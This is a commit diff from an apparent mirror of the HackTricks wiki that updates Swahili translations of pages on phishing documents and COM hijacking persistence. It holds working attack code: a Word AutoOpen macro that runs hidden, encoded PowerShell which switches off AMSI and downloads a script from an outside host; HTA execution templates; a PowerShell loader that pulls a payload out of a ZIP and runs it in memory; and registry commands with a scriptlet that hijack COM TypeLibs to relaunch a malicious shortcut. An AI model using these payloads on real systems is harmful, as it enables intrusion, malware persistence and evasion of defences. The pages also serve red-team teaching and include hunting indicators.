maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-methodologies-and-resources/phishing-methodolog

Browse Source
This commit is contained in:
Translator 2025-08-28 22:49:47 +00:00
parent 6e56939ffc
commit d1109cd1ee
2 changed files with 145 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

109
src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View File

@ -1,40 +1,40 @@
# Phishing Files & Documents # Faili na Nyaraka za Phishing
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## Office Documents ## Nyaraka za Office
Microsoft Word hufanya uthibitisho wa data za faili kabla ya kufungua faili. Uthibitisho wa data unafanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochambuliwa haitafunguliwa. Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, kwa mujibu wa kiwango cha OfficeOpenXML. Ikiwa kosa lolote litatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kwa kawaida, faili za Word zinazokuwa na macros hutumia kiambishi cha `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha kiambishi cha faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\ Kwa kawaida, faili za Word zinazobeba macros hutumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wake wa kutekeleza macros.\
Kwa mfano, faili ya RTF haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\ Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mifumo na mitambo sawa inatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.). Mifumo ya ndani na taratibu sawa zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).
Unaweza kutumia amri ifuatayo kuangalia ni kiambishi gani kitakachotekelezwa na baadhi ya programu za Office: Unaweza kutumia amri ifuatayo kuangalia ni zipi extensions zitakazotekelezwa na baadhi ya programu za Office:
```bash ```bash
assoc | findstr /i "word excel powerp" assoc | findstr /i "word excel powerp"
``` ```
DOCX faili zinazorejelea templeti ya mbali (File Options Add-ins Manage: Templates Go) ambayo inajumuisha macros zinaweza "kutekeleza" macros pia. Faili za DOCX zinazorejelea template ya mbali (File Options Add-ins Manage: Templates Go) ambazo zinajumuisha macros zinaweza pia “kutekeleza” macros.
### Upakuaji wa Picha za Nje ### Kupakia Picha za Nje
Nenda kwa: _Insert --> Quick Parts --> Field_\ Nenda kwa: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, na **Filename or URL**:_ http://\<ip>/whatever _**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
![](<../../images/image (155).png>) ![](<../../images/image (155).png>)
### Backdoor za Macros ### Macros Backdoor
Inawezekana kutumia macros kuendesha msimbo wowote kutoka kwa hati. Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye document.
#### Kazi za Autoload #### Autoload functions
Kadri zinavyokuwa za kawaida, ndivyo uwezekano wa AV kuzitambua unavyoongezeka. Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
- AutoOpen() - AutoOpen()
- Document_Open() - Document_Open()
#### Mifano ya Msimbo wa Macros #### Macros Code Examples
```vba ```vba
Sub AutoOpen() Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=") CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@ -64,16 +64,16 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated> proc.Create "powershell <beacon line generated>
``` ```
#### Ondoa metadata kwa mikono #### Ondoa metadata kwa mkono
Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**. Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
#### Upanuzi wa Doc #### Extension ya Doc
Unapomaliza, chagua **Save as type** dropdown, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\ Ukimaliza, chagua dropdown ya **Save as type**, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stigma** **kuhusu** upanuzi wa macro-enabled **`.docm`** (kwa mfano, ikoni ya thumbnail ina `!` kubwa na baadhi ya lango la wavuti/barua pepe linaweza kuzuia kabisa). Hivyo, upanuzi huu wa zamani wa `.doc` ni **mkataba bora**. Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu ugani unaowezesha macro **`.docm`** (kwa mfano, icon ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/baruapepe huvizuia kabisa). Kwa hiyo, **ugani wa kale `.doc` ndio suluhisho bora**.
#### Watengenezaji wa Macros Mbaya #### Vyanzo vya Malicious Macros
- MacOS - MacOS
- [**macphish**](https://github.com/cldrn/macphish) - [**macphish**](https://github.com/cldrn/macphish)
@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stig
## Faili za HTA ## Faili za HTA
HTA ni programu ya Windows ambayo **inaunganisha HTML na lugha za skripti (kama VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "iliyokubaliwa kikamilifu", bila vizuizi vya mfano wa usalama wa kivinjari. HTA ni programu ya Windows inayochanganya **HTML na lugha za scripting (k.m. VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inaendeshwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, ikifanya **`mshta` kuwa tegemezi kwa IE**. Hivyo ikiwa imeondolewa, HTAs hazitaweza kutekelezwa. HTA inaenzishwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imesakinishwa** pamoja na **Internet Explorer**, na kufanya **`mshta` inategemea IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
```html ```html
<--! Basic HTA Execution --> <--! Basic HTA Execution -->
<html> <html>
@ -138,11 +138,11 @@ var_func
self.close self.close
</script> </script>
``` ```
## Kulazimisha Uthibitisho wa NTLM ## Kulazimisha NTLM Authentication
Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tumia mwathirika **anwani ya faili** ambazo zita **anzisha** **uthibitisho** tu kwa **kufungua folda.** Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifungua (hata HTTP MitM?). Au mtumie mwathiriwa **anwani ya faili** zitakazowasababisha **authentication** tu kwa **ufunguaji wa folda.**
**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:** **Tazama mawazo haya na zaidi kwenye kurasa zifuatazo:**
{{#ref}} {{#ref}}
@ -156,9 +156,60 @@ Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, u
### NTLM Relay ### NTLM Relay
Usisahau kwamba huwezi tu kuiba hash au uthibitisho bali pia **fanya mashambulizi ya NTLM relay**: Usisahau kwamba huwezi kuiba tu hash au authentication pekee, bali pia unaweza **perform NTLM relay attacks**:
- [**Mashambulizi ya NTLM Relay**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) - [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay kwa vyeti)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha nyaraka mbili halali za kupotosha (PDF/DOCX) na .lnk hatari. Mbinu ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama ya kipekee, na .lnk huitaibua na kuiendesha kabisa kwenye kumbukumbu.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tambua ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na folda mzazi ya current working directory.
2) Soma bytes za ZIP na utafute marker uliowekwa kwenye msimbo (mfano, xFIQCV). Yote yanayofuata marker ni PowerShell payload iliyojazwa ndani.
3) Nakili ZIP hadi %ProgramData%, itolee hapo (extract), kisha fungua .docx ya kupotosha ili ionekane halali.
4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (kwa mfano, ondoa tabia zote za #) na uitekeleze kwenye kumbukumbu.
Mfano wa skeleton ya PowerShell ili kuibua na kuendesha hatua iliyojazwa ndani:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
```
Notes
- Usambazaji mara nyingi unatumia vibamba vya subdomain vya PaaS vinavyoaminika (e.g., *.herokuapp.com) na unaweza gate payloads (kutumia ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuiendesha kupitia Reflection.Emit + VirtualAlloc ili kupunguza athari za diski.
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control ili IE/Explorer au programu yoyote inayoiingiza ianze upya payload kiotomatiki. See details and ready-to-use commands here:
{{#ref}}
../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
{{#endref}}
Hunting/IOCs
- ZIP files zenye kamba ya alama ya ASCII (e.g., xFIQCV) iliyoongezwa kwenye data ya archive.
- .lnk inayoorodhesha folda za mzazi/mtumiaji ili kupata ZIP na kufungua nyaraka ya kudanganya.
- Kuchezewa kwa AMSI kupitia [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Nyuzi za biashara zinazodumu muda mrefu zikimalizika kwa viungo vinavyoandikwa chini ya vikoa vya PaaS vinavyoaminika.
## References
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}

72
src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
View File

@ -2,15 +2,15 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
### Kutafuta sehemu za COM zisizopo ### Kutafuta vipengele vya COM visivyopo
Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mekanismu ya kudumu**. Kwa kutumia `procmon` ni rahisi kupata rejista za COM zilizotafutwa ambazo hazipo ambazo mshambuliaji anaweza kuunda ili kudumu. Filters: Kama thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kutumia `procmon` ni rahisi kupata rejista za COM zilizoombwa ambazo hazipo na ambazo mshambuliaji anaweza kuziunda ili kudumu. Vichujio:
- **RegOpenKey** operations. - **RegOpenKey** operations.
- ambapo _Result_ ni **NAME NOT FOUND**. - ambapo _Result_ ni **NAME NOT FOUND**.
- na _Path_ inamalizika na **InprocServer32**. - na _Path_ inamalizika na **InprocServer32**.
Mara tu unapokuwa umeamua ni COM ipi isiyopo unayotaka kuiga, tekeleza amri zifuatazo. _Kuwa makini ikiwa unataka kuiga COM inayopakuliwa kila sekunde chache kwani hiyo inaweza kuwa kupita kiasi._ Mara uamapoamua ni COM gani isiyokuwepo kuigiza, tekeleza amri zifuatazo. _Angalia kwa uangalifu ikiwa utaamua kuiga COM ambayo inapakiwa kila sekunde chache kwani hiyo inaweza kuwa ya kupitiliza._
```bash ```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll" New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
@ -18,7 +18,7 @@ New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F
``` ```
### Hijackable Task Scheduler COM components ### Hijackable Task Scheduler COM components
Windows Tasks hutumia Custom Triggers kuita COM objects na kwa sababu zinafanywa kupitia Task Scheduler, ni rahisi kutabiri wakati zitakapoitwa. Windows Tasks zinatumia Custom Triggers kuita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaanzishwa.
<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs <pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
$Tasks = Get-ScheduledTask $Tasks = Get-ScheduledTask
@ -49,9 +49,9 @@ Write-Host
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1} # CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]</code></pre> # [more like the previous one...]</code></pre>
Kuangalia matokeo unaweza kuchagua moja ambayo itatekelezwa **kila wakati mtumiaji anapoingia** kwa mfano. Ukikagua matokeo unaweza kuchagua moja ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano.
Sasa kutafuta CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kwa kawaida utaona kwamba thamani hiyo haipo katika HKCU. Sasa unapochunguza CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kwamba thamani haipo katika HKCU.
```bash ```bash
# Exists in HKCR\CLSID\ # Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}" Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
@ -72,6 +72,64 @@ Name Property
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist. Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
``` ```
Kisha, unaweza tu kuunda kiingilio cha HKCU na kila wakati mtumiaji anapoingia, nyuma yako itawashwa. Kisha, unaweza tu kuunda kiingilio cha HKCU na kila mtumiaji anapoingia, backdoor yako itaanzishwa.
---
## COM TypeLib Hijacking (script: moniker persistence)
Type Libraries (TypeLib) zinaelezea COM interfaces na zinaingizwa kupitia `LoadTypeLib()`. Wakati COM server inapoanzishwa, OS pia inaweza kuingiza TypeLib inayohusiana kwa kushauriana na funguo za rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa na **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib inapogunduliwa — na kusababisha persistence ya kimyakimya inayochochewa wakati vipengele vya kawaida vinapoguswa.
Hii imeonekana dhidi ya Microsoft Web Browser control (inayoingizwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`).
### Hatua (PowerShell)
1) Tambua TypeLib (LIBID) inayotumiwa na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumika mara nyingi na minyororo ya malware: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser).
```powershell
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName
"CLSID=$clsid LIBID=$libid VER=$ver"
```
2) Elekeza njia ya TypeLib ya mtumiaji mmoja kwa scriptlet ya ndani ukitumia moniker `script:` (no admin rights required):
```powershell
$dest = 'C:\\ProgramData\\Udate_Srv.sct'
New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null
Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest"
```
3) Drop JScript `.sct` ndogo kabisa inayowasha tena primary payload yako (kwa mfano `.lnk` inayotumiwa na initial chain):
```xml
<?xml version="1.0"?>
<scriptlet>
<registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
<script language="JScript">
<![CDATA[
try {
var sh = new ActiveXObject('WScript.Shell');
// Re-launch the malicious LNK for persistence
var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
sh.Run(cmd, 0, false);
} catch(e) {}
]]>
</script>
</scriptlet>
```
4) Kuchochea kufungua IE, programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitapakia TypeLib na kutekeleza scriptlet, zikirejesha mnyororo wako wakati wa logon/reboot.
Usafishaji
```powershell
# Remove the per-user TypeLib hijack
Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null
# Delete the dropped scriptlet
Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null
```
Vidokezo
- Unaweza kutumia mantiki ile ile kwa COM components nyingine zinazotumika mara kwa mara; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza.
- Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya `win64` kwa watumiaji wa 64-bit.
## Marejeo
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}